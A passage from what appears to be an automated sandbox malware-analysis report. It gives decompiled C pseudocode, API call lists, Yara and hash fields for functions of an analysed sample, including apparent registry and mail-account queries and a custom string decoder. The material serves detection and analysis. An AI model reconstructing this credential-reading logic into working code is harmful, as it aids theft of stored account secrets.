                                                                                                                                                                  0x0040befb
                                                                                                                                                                  0x0040befe
                                                                                                                                                                  0x0040bf00
                                                                                                                                                                  0x0040bf04
                                                                                                                                                                  0x0040bf33
                                                                                                                                                                  0x0040bf06
                                                                                                                                                                  0x0040bf0b
                                                                                                                                                                  0x0040bf10
                                                                                                                                                                  0x0040bf17
                                                                                                                                                                  0x0040bf21
                                                                                                                                                                  0x0040bf29
                                                                                                                                                                  0x0040bf3e
                                                                                                                                                                  0x0040bf44
                                                                                                                                                                  0x0040bf4c
                                                                                                                                                                  0x0040bf58
                                                                                                                                                                  0x0040bf6a

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$memcpy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 368790112-0
                                                                                                                                                                  • Opcode ID: f09e4137cee235a1b9d7fd27eaadac0c52e283a178c2e8a252c289c30bf46ad1
                                                                                                                                                                  • Instruction ID: 1bd4811e219587db2c743c544c50c2778389369fcaa1acc1f1d0acac3f9f4604
                                                                                                                                                                  • Opcode Fuzzy Hash: f09e4137cee235a1b9d7fd27eaadac0c52e283a178c2e8a252c289c30bf46ad1
                                                                                                                                                                  • Instruction Fuzzy Hash: D90128B1650B002BD235AB35CD03F6B77A4EB54B14F000B1EF642E66D3D7A8A14489AD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040242B, Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040242B(void* __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16) {
				void _v2058;
				char _v2060;
				char _v2069;
				char _v2070;
				char _v2071;
				char _v2072;
				char _v3086;
				signed char _v3090;
				char _v3091;
				char _v3092;
				char* _v3096;
				char _v3100;
				short* _v3104;
				int _v3108;
				char _v3112;
				void* __ebx;
				void* _t49;
				signed int _t61;
				short* _t76;
				void* _t83;
				signed int _t87;
				void* _t90;

				_t83 = __eax;
				_t73 = 0;
				 *_a12 = 0;
				_v3112 = 0x400;
				_t49 = E0040F214(__ecx, _a4, _a8,  &_v3092,  &_v3112);
				_t90 = (_t87 & 0xfffffff8) - 0xc28 + 0x10;
				if(_t49 == 0) {
					_v2069 = 0;
					_v2070 = 0;
					_v2071 = 0;
					_v2072 = 0;
					if(_v3092 != 1) {
						if(_v3092 == 2 &&  *((intOrPtr*)(_t83 + 0xa94)) != 0) {
							_v3100 = _v3112 - 1;
							_v3096 =  &_v3091;
							if(E0040481B(_t83 + 0x890,  &_v3100, 0,  &_v3108) != 0) {
								WideCharToMultiByte(0, 0, _v3104, _v3108, _a12, 0x7f, 0, 0);
								LocalFree(_v3104);
							}
						}
					} else {
						if( *((intOrPtr*)(_t83 + 0x888)) != 0) {
							if(_a16 == 0) {
								E0040EFF9(_a12, _t83 + 0x87c,  &_v3090, 0x7f, 0);
							} else {
								_v2060 = 0;
								memset( &_v2058, 0, 0x800);
								_t90 = _t90 + 0xc;
								_t76 =  &_v2060;
								E0040EFF9(_t76, _t83 + 0x87c,  &_v3091, 0x400, 1);
								WideCharToMultiByte(0, 0, _t76, 0xffffffff, _a12, 0x7f, 0, 0);
							}
							_t73 = 0;
						}
						_t79 = _a12;
						if( *_a12 == _t73 && _v3112 >= 7 && _v3092 == 1 && _v3091 == 1) {
							_t61 = _v3090 & 0x000000ff;
							if(_t61 > 1 && _v3112 >= _t61 + 6) {
								E00401DBC(_t79,  &_v3086, _t61);
							}
						}
					}
				}
				return 0 |  *_a12 != _t73;
			}

























                                                                                                                                                                  0x00402439
                                                                                                                                                                  0x0040243e
                                                                                                                                                                  0x00402440
                                                                                                                                                                  0x0040244f
                                                                                                                                                                  0x0040245a
                                                                                                                                                                  0x0040245f
                                                                                                                                                                  0x00402464
                                                                                                                                                                  0x0040246f
                                                                                                                                                                  0x00402476
                                                                                                                                                                  0x0040247d
                                                                                                                                                                  0x00402484
                                                                                                                                                                  0x0040248b
                                                                                                                                                                  0x0040255d
                                                                                                                                                                  0x0040256c
                                                                                                                                                                  0x00402574
                                                                                                                                                                  0x00402590
                                                                                                                                                                  0x004025a3
                                                                                                                                                                  0x004025ad
                                                                                                                                                                  0x004025ad
                                                                                                                                                                  0x00402590
                                                                                                                                                                  0x00402491
                                                                                                                                                                  0x00402497
                                                                                                                                                                  0x0040249c
                                                                                                                                                                  0x00402505
                                                                                                                                                                  0x0040249e
                                                                                                                                                                  0x004024ac
                                                                                                                                                                  0x004024b4
                                                                                                                                                                  0x004024b9
                                                                                                                                                                  0x004024cf
                                                                                                                                                                  0x004024d6
                                                                                                                                                                  0x004024eb
                                                                                                                                                                  0x004024eb
                                                                                                                                                                  0x0040250a
                                                                                                                                                                  0x0040250a
                                                                                                                                                                  0x0040250c
                                                                                                                                                                  0x00402511
                                                                                                                                                                  0x00402534
                                                                                                                                                                  0x0040253c
                                                                                                                                                                  0x0040254e
                                                                                                                                                                  0x00402553
                                                                                                                                                                  0x0040253c
                                                                                                                                                                  0x00402511
                                                                                                                                                                  0x0040248b
                                                                                                                                                                  0x004025c2

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040F214: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040245F,?), ref: 0040F22A
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004024EB
                                                                                                                                                                  • memset.MSVCRT ref: 004024B4
                                                                                                                                                                    • Part of subcall function 0040EFF9: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040F016
                                                                                                                                                                    • Part of subcall function 0040EFF9: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040F037
                                                                                                                                                                    • Part of subcall function 0040EFF9: memcpy.MSVCRT ref: 0040F075
                                                                                                                                                                    • Part of subcall function 0040EFF9: CoTaskMemFree.OLE32(00000000,00000000), ref: 0040F084
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 004025A3
                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 004025AD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3503910906-0
                                                                                                                                                                  • Opcode ID: 311549387020673e673ad7ade458deddd79687b60b573298398fe302b42a0f0d
                                                                                                                                                                  • Instruction ID: cfc3eb1076764f39a441947bf0103a86c194fcc0ae6958193510771120a15821
                                                                                                                                                                  • Opcode Fuzzy Hash: 311549387020673e673ad7ade458deddd79687b60b573298398fe302b42a0f0d
                                                                                                                                                                  • Instruction Fuzzy Hash: 0341A3B1408385BFDB11DE608D44AAB7BDCAB88304F044A7EF588A21C1D679DA44CB5A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040B4DE, Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                                                  			E0040B4DE(intOrPtr __ecx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void _v263;
				char _v264;
				void* __edi;
				void* __esi;
				signed int _t42;
				signed int _t45;
				intOrPtr* _t60;
				signed char _t62;
				intOrPtr _t63;
				int _t65;

				_t61 = __ecx;
				_t60 = _a8;
				_t63 = __ecx;
				_v8 = __ecx;
				if( *(_t60 + 4) == 0x103 &&  *((intOrPtr*)(_t60 + 8)) == 0xfffffff4) {
					_t42 = E00408D0D( *((intOrPtr*)(__ecx + 0x370)), _t60);
					 *((intOrPtr*)(_t63 + 0x10c)) = 1;
					 *(_t63 + 0x110) = _t42;
				}
				if(_a4 == 0x101 &&  *((intOrPtr*)(_t60 + 8)) == 0xfffffffe &&  *((intOrPtr*)(_t60 + 0xc)) == 1) {
					_v264 = 0;
					memset( &_v263, 0, 0xff);
					E004019DA(_t61,  &_v264, 0x413438);
					_t42 = E00406552( *((intOrPtr*)(_v8 + 0x108)),  &_v264);
					_t63 = _v8;
				}
				_t65 = 0;
				if( *((intOrPtr*)(_t60 + 8)) == 0xfffffdf8) {
					_t42 = SendMessageA( *(_t63 + 0x118), 0x423, 0, 0);
					if( *_t60 == _t42) {
						_t42 = GetMenuStringA( *(_t63 + 0x11c),  *(_t60 + 4), _t60 + 0x10, 0x4f, 0);
						 *((intOrPtr*)(_t60 + 0x60)) = 0;
					}
				}
				if(_a4 != 0x103) {
					L27:
					return _t42;
				} else {
					_t80 =  *((intOrPtr*)(_t60 + 8)) - 0xfffffffd;
					if( *((intOrPtr*)(_t60 + 8)) == 0xfffffffd) {
						_t42 = E0040AFC4(_t61, _t63, _t63, _t80);
						_t65 = 0;
					}
					if( *((intOrPtr*)(_t60 + 8)) == 0xffffff94) {
						_t42 = E00408C35( *(_t60 + 0x10), _t61,  *((intOrPtr*)(_t63 + 0x370)), _t65);
						_t65 = 0;
					}
					if( *((intOrPtr*)(_t60 + 8)) != 0xffffff9b) {
						goto L27;
					} else {
						if( *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x370)) + 0x1b8)) == _t65) {
							_t62 = 2;
							_t45 =  *(_t60 + 0x14) & _t62;
							__eflags = _t45;
							if(_t45 == 0) {
								L20:
								__eflags = _t45 - _t62;
								if(_t45 == _t62) {
									L23:
									_t42 = 0;
									__eflags = 0;
									L24:
									if(_t42 == _t65) {
										goto L27;
									}
									_t42 = _t63 + 0x25c;
									if( *_t42 != _t65) {
										goto L27;
									}
									 *_t42 = 1;
									return PostMessageA( *(_t63 + 0x108), 0x402, _t65, _t65);
								}
								__eflags =  *(_t60 + 0x18) & _t62;
								if(( *(_t60 + 0x18) & _t62) == 0) {
									goto L23;
								}
								L22:
								_t42 = 1;
								goto L24;
							}
							__eflags =  *(_t60 + 0x18) & _t62;
							if(( *(_t60 + 0x18) & _t62) == 0) {
								goto L22;
							}
							goto L20;
						}
						asm("sbb eax, eax");
						_t42 =  ~( ~(( *(_t60 + 0x18) ^  *(_t60 + 0x14)) & 0x0000f002));
						goto L24;
					}
				}
			}














                                                                                                                                                                  0x0040b4de
                                                                                                                                                                  0x0040b4e8
                                                                                                                                                                  0x0040b4f4
                                                                                                                                                                  0x0040b4f6
                                                                                                                                                                  0x0040b4f9
                                                                                                                                                                  0x0040b509
                                                                                                                                                                  0x0040b50e
                                                                                                                                                                  0x0040b518
                                                                                                                                                                  0x0040b518
                                                                                                                                                                  0x0040b525
                                                                                                                                                                  0x0040b541
                                                                                                                                                                  0x0040b548
                                                                                                                                                                  0x0040b558
                                                                                                                                                                  0x0040b569
                                                                                                                                                                  0x0040b56e
                                                                                                                                                                  0x0040b571
                                                                                                                                                                  0x0040b574
                                                                                                                                                                  0x0040b57d
                                                                                                                                                                  0x0040b58c
                                                                                                                                                                  0x0040b594
                                                                                                                                                                  0x0040b5a6
                                                                                                                                                                  0x0040b5ac
                                                                                                                                                                  0x0040b5ac
                                                                                                                                                                  0x0040b594
                                                                                                                                                                  0x0040b5b6
                                                                                                                                                                  0x0040b653
                                                                                                                                                                  0x0040b653
                                                                                                                                                                  0x0040b5bc
                                                                                                                                                                  0x0040b5bc
                                                                                                                                                                  0x0040b5c0
                                                                                                                                                                  0x0040b5c4
                                                                                                                                                                  0x0040b5c9
                                                                                                                                                                  0x0040b5c9
                                                                                                                                                                  0x0040b5cf
                                                                                                                                                                  0x0040b5db
                                                                                                                                                                  0x0040b5e0
                                                                                                                                                                  0x0040b5e0
                                                                                                                                                                  0x0040b5e6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b5e8
                                                                                                                                                                  0x0040b5f4
                                                                                                                                                                  0x0040b60e
                                                                                                                                                                  0x0040b60f
                                                                                                                                                                  0x0040b60f
                                                                                                                                                                  0x0040b611
                                                                                                                                                                  0x0040b618
                                                                                                                                                                  0x0040b618
                                                                                                                                                                  0x0040b61a
                                                                                                                                                                  0x0040b626
                                                                                                                                                                  0x0040b626
                                                                                                                                                                  0x0040b626
                                                                                                                                                                  0x0040b628
                                                                                                                                                                  0x0040b62a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b62c
                                                                                                                                                                  0x0040b634
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b643
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b649
                                                                                                                                                                  0x0040b61c
                                                                                                                                                                  0x0040b61f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b621
                                                                                                                                                                  0x0040b623
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b623
                                                                                                                                                                  0x0040b613
                                                                                                                                                                  0x0040b616
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b616
                                                                                                                                                                  0x0040b603
                                                                                                                                                                  0x0040b605
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b605
                                                                                                                                                                  0x0040b5e6

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040B548
                                                                                                                                                                  • SendMessageA.USER32 ref: 0040B58C
                                                                                                                                                                  • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040B5A6
                                                                                                                                                                  • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040B649
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message$MenuPostSendStringmemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3798638045-0
                                                                                                                                                                  • Opcode ID: d3a55612aad303442b70cf6981c395df1170026015e9bbabf54ddfea19c8819b
                                                                                                                                                                  • Instruction ID: f81f675eeec9d049c2f837a36ed854dba7505ce636643832e7163bdc5c509590
                                                                                                                                                                  • Opcode Fuzzy Hash: d3a55612aad303442b70cf6981c395df1170026015e9bbabf54ddfea19c8819b
                                                                                                                                                                  • Instruction Fuzzy Hash: F141E130600611EFCB259F24CC85AA6BBA4FF04325F1486B6E958AB2C5C378DD91CBDD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040A283, Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                                                  			E0040A283(void* __eax, void* __eflags, char* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				signed int _t63;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int _t79;
				void* _t84;
				signed int _t86;
				char* _t98;
				void* _t100;
				void* _t102;
				void* _t104;
				void* _t106;
				void* _t107;

				_t84 = __eax;
				E00408A97(__eax, __eflags);
				_t86 = 0;
				_v12 = 0;
				while(1) {
					_t98 = _a4;
					if( *((intOrPtr*)(_t86 + _t98)) - 0x30 > 9) {
						break;
					}
					_t86 = _t86 + 1;
					if(_t86 < 1) {
						continue;
					}
					if(strlen(_t98) >= 3) {
						break;
					}
					_t79 = atoi(_a4);
					if(_t79 >= 0 && _t79 <  *((intOrPtr*)(_t84 + 0x20))) {
						_v12 =  *((intOrPtr*)( *( *((intOrPtr*)(_t84 + 0x24)) + _t79 * 4) * 0x14 +  *((intOrPtr*)(_t84 + 0x1b4))));
					}
					L21:
					if(_a8 != 0) {
						_v12 = _v12 | 0x00001000;
					}
					_t63 = _v12;
					 *0x41848c =  *0x41848c + 1;
					 *((intOrPtr*)(0x418490 +  *0x41848c * 4)) = _t63;
					return _t63;
				}
				_t104 = 0;
				__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
				_v16 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
					L14:
					_t100 = 0;
					__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
					_v8 = 0;
					if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
						L20:
						goto L21;
					}
					_t106 = 0;
					__eflags = 0;
					do {
						_v20 = E00406A01(0, _a4);
						_t67 = E00406A01(0, _a4);
						__eflags = _v20;
						if(_v20 >= 0) {
							L18:
							_v12 =  *((intOrPtr*)(_t106 +  *((intOrPtr*)(_t84 + 0x1b4))));
							goto L19;
						}
						__eflags = _t67;
						if(_t67 < 0) {
							goto L19;
						}
						goto L18;
						L19:
						_v8 = _v8 + 1;
						_t100 = _t100 + 0x10;
						_t106 = _t106 + 0x14;
						__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
					} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
					goto L20;
				}
				_t102 = 0;
				__eflags = 0;
				do {
					_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x1b4)) + _t104 + 0x10));
					_push(_a4);
					_push(_t72);
					L0041207E();
					_push(_a4);
					_v20 = _t72;
					_t74 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x34)) + _t102 + 0xc));
					_push(_t74);
					L0041207E();
					_t107 = _t107 + 0x10;
					__eflags = _v20;
					if(_v20 == 0) {
						L11:
						_v12 =  *(_t104 +  *((intOrPtr*)(_t84 + 0x1b4)));
						_v16 = 1;
						goto L12;
					}
					__eflags = _t74;
					if(_t74 != 0) {
						goto L12;
					}
					goto L11;
					L12:
					_v8 = _v8 + 1;
					_t102 = _t102 + 0x10;
					_t104 = _t104 + 0x14;
					__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
				} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
				__eflags = _v16;
				if(_v16 != 0) {
					goto L20;
				}
				goto L14;
			}





















                                                                                                                                                                  0x0040a28a
                                                                                                                                                                  0x0040a28c
                                                                                                                                                                  0x0040a291
                                                                                                                                                                  0x0040a293
                                                                                                                                                                  0x0040a296
                                                                                                                                                                  0x0040a296
                                                                                                                                                                  0x0040a2a0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a2a2
                                                                                                                                                                  0x0040a2a6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a2b2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a2b7
                                                                                                                                                                  0x0040a2bf
                                                                                                                                                                  0x0040a2e0
                                                                                                                                                                  0x0040a2e0
                                                                                                                                                                  0x0040a3c1
                                                                                                                                                                  0x0040a3c6
                                                                                                                                                                  0x0040a3c8
                                                                                                                                                                  0x0040a3c8
                                                                                                                                                                  0x0040a3d5
                                                                                                                                                                  0x0040a3d8
                                                                                                                                                                  0x0040a3de
                                                                                                                                                                  0x0040a3e6
                                                                                                                                                                  0x0040a3e6
                                                                                                                                                                  0x0040a2e9
                                                                                                                                                                  0x0040a2eb
                                                                                                                                                                  0x0040a2f2
                                                                                                                                                                  0x0040a2f5
                                                                                                                                                                  0x0040a2f8
                                                                                                                                                                  0x0040a35c
                                                                                                                                                                  0x0040a35c
                                                                                                                                                                  0x0040a35e
                                                                                                                                                                  0x0040a364
                                                                                                                                                                  0x0040a367
                                                                                                                                                                  0x0040a3bf
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a3c0
                                                                                                                                                                  0x0040a369
                                                                                                                                                                  0x0040a369
                                                                                                                                                                  0x0040a36b
                                                                                                                                                                  0x0040a389
                                                                                                                                                                  0x0040a38e
                                                                                                                                                                  0x0040a393
                                                                                                                                                                  0x0040a399
                                                                                                                                                                  0x0040a39f
                                                                                                                                                                  0x0040a3a8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a3a8
                                                                                                                                                                  0x0040a39b
                                                                                                                                                                  0x0040a39d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a3ab
                                                                                                                                                                  0x0040a3ab
                                                                                                                                                                  0x0040a3b1
                                                                                                                                                                  0x0040a3b4
                                                                                                                                                                  0x0040a3b7
                                                                                                                                                                  0x0040a3b7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a36b
                                                                                                                                                                  0x0040a2fa
                                                                                                                                                                  0x0040a2fa
                                                                                                                                                                  0x0040a2fc
                                                                                                                                                                  0x0040a302
                                                                                                                                                                  0x0040a306
                                                                                                                                                                  0x0040a309
                                                                                                                                                                  0x0040a30a
                                                                                                                                                                  0x0040a30f
                                                                                                                                                                  0x0040a312
                                                                                                                                                                  0x0040a318
                                                                                                                                                                  0x0040a31c
                                                                                                                                                                  0x0040a31d
                                                                                                                                                                  0x0040a322
                                                                                                                                                                  0x0040a325
                                                                                                                                                                  0x0040a329
                                                                                                                                                                  0x0040a32f
                                                                                                                                                                  0x0040a338
                                                                                                                                                                  0x0040a33b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a33b
                                                                                                                                                                  0x0040a32b
                                                                                                                                                                  0x0040a32d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a342
                                                                                                                                                                  0x0040a342
                                                                                                                                                                  0x0040a348
                                                                                                                                                                  0x0040a34b
                                                                                                                                                                  0x0040a34e
                                                                                                                                                                  0x0040a34e
                                                                                                                                                                  0x0040a356
                                                                                                                                                                  0x0040a35a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00408A97: ??2@YAPAXI@Z.MSVCRT ref: 00408AB8
                                                                                                                                                                    • Part of subcall function 00408A97: ??3@YAXPAX@Z.MSVCRT ref: 00408B7F
                                                                                                                                                                  • strlen.MSVCRT ref: 0040A2A9
                                                                                                                                                                  • atoi.MSVCRT ref: 0040A2B7
                                                                                                                                                                  • _mbsicmp.MSVCRT ref: 0040A30A
                                                                                                                                                                  • _mbsicmp.MSVCRT ref: 0040A31D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4107816708-0
                                                                                                                                                                  • Opcode ID: fcbe6108af864edb97e3be4016439bdb3d8805d59c5b364e212079bc31d54683
                                                                                                                                                                  • Instruction ID: a4071902e71568577f89ec7532499d814672e4af5b69a40392892895b6c6556c
                                                                                                                                                                  • Opcode Fuzzy Hash: fcbe6108af864edb97e3be4016439bdb3d8805d59c5b364e212079bc31d54683
                                                                                                                                                                  • Instruction Fuzzy Hash: 2F414C35900304ABCB11DFA9C580A9ABBF4FB48308F1085BEEC45EB382D775DA51CB59
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00411533, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00411533(char* __eax, void* __edi) {
				unsigned int _v5;
				signed int _v6;
				signed int _v7;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _t37;
				char* _t56;
				signed char _t57;
				char* _t67;
				void* _t68;
				void* _t69;

				_t68 = __edi;
				_t56 = __eax;
				_t69 = 0;
				_t37 = strlen(__eax) + 0xfffffffd;
				_v16 = _t37;
				if(_t37 < 0) {
					L18:
					 *((char*)(_t69 + _t68)) = 0;
					return _t69;
				}
				_v12 = 0xfffffffe;
				_v12 = _v12 - _t56;
				_t5 = _t56 + 2; // 0x4116ad
				_t67 = _t5;
				while(1) {
					_t6 = _t67 - 2; // 0x75fff88b
					_t39 =  *_t6;
					if( *_t6 != 0x2e) {
						_v6 = E004114FF(_t39);
					} else {
						_v6 = 0x3e;
					}
					_t9 = _t67 - 1; // 0xfc75fff8
					_t41 =  *_t9;
					if( *_t9 != 0x2e) {
						_v5 = E004114FF(_t41);
					} else {
						_v5 = 0x3e;
					}
					_t43 =  *_t67;
					if( *_t67 != 0x2e) {
						_t57 = E004114FF(_t43);
					} else {
						_t57 = 0x3e;
					}
					_t45 =  *((intOrPtr*)(_t67 + 1));
					if( *((intOrPtr*)(_t67 + 1)) != 0x2e) {
						_v7 = E004114FF(_t45);
					} else {
						_v7 = 0x3e;
					}
					 *(_t68 + _t69) = _v5 >> 0x00000004 | _v6 << 0x00000002;
					if( *_t67 == 0x2d) {
						break;
					}
					 *(_t69 + _t68 + 1) = _t57 >> 0x00000002 | _v5 << 0x00000004;
					if( *((char*)(_t67 + 1)) == 0x2d) {
						 *((char*)(_t69 + _t68 + 2)) = 0;
						_t34 = _t69 + 2; // 0x2
						return _t34;
					}
					_t69 = _t69 + 3;
					 *(_t69 + _t68 - 1) = _t57 << 0x00000006 | _v7;
					_t25 = _t69 + 5; // 0x2
					_t67 = _t67 + 4;
					if(_t25 >= 0x3ff || _v12 + _t67 > _v16) {
						goto L18;
					} else {
						continue;
					}
				}
				 *(_t69 + _t68 + 1) = 0;
				_t31 = _t69 + 1; // 0x1
				return _t31;
			}














                                                                                                                                                                  0x00411533
                                                                                                                                                                  0x0041153b
                                                                                                                                                                  0x0041153e
                                                                                                                                                                  0x00411545
                                                                                                                                                                  0x00411549
                                                                                                                                                                  0x0041154c
                                                                                                                                                                  0x00411604
                                                                                                                                                                  0x00411604
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00411608
                                                                                                                                                                  0x00411552
                                                                                                                                                                  0x00411559
                                                                                                                                                                  0x0041155c
                                                                                                                                                                  0x0041155c
                                                                                                                                                                  0x0041155f
                                                                                                                                                                  0x0041155f
                                                                                                                                                                  0x0041155f
                                                                                                                                                                  0x00411564
                                                                                                                                                                  0x00411571
                                                                                                                                                                  0x00411566
                                                                                                                                                                  0x00411566
                                                                                                                                                                  0x00411566
                                                                                                                                                                  0x00411574
                                                                                                                                                                  0x00411574
                                                                                                                                                                  0x00411579
                                                                                                                                                                  0x00411586
                                                                                                                                                                  0x0041157b
                                                                                                                                                                  0x0041157b
                                                                                                                                                                  0x0041157b
                                                                                                                                                                  0x00411589
                                                                                                                                                                  0x0041158d
                                                                                                                                                                  0x00411598
                                                                                                                                                                  0x0041158f
                                                                                                                                                                  0x0041158f
                                                                                                                                                                  0x0041158f
                                                                                                                                                                  0x0041159a
                                                                                                                                                                  0x0041159f
                                                                                                                                                                  0x004115ac
                                                                                                                                                                  0x004115a1
                                                                                                                                                                  0x004115a1
                                                                                                                                                                  0x004115a1
                                                                                                                                                                  0x004115bd
                                                                                                                                                                  0x004115c3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004115d2
                                                                                                                                                                  0x004115da
                                                                                                                                                                  0x00411618
                                                                                                                                                                  0x0041161d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041161d
                                                                                                                                                                  0x004115e2
                                                                                                                                                                  0x004115e5
                                                                                                                                                                  0x004115e9
                                                                                                                                                                  0x004115ec
                                                                                                                                                                  0x004115f4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004115f4
                                                                                                                                                                  0x0041160e
                                                                                                                                                                  0x00411613
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: strlen
                                                                                                                                                                  • String ID: >$>$>
                                                                                                                                                                  • API String ID: 39653677-3911187716
                                                                                                                                                                  • Opcode ID: 7edb754ddf4429fd3ce2b30709e1edacb08f523e3e7d14c7b467b5b93d7c181c
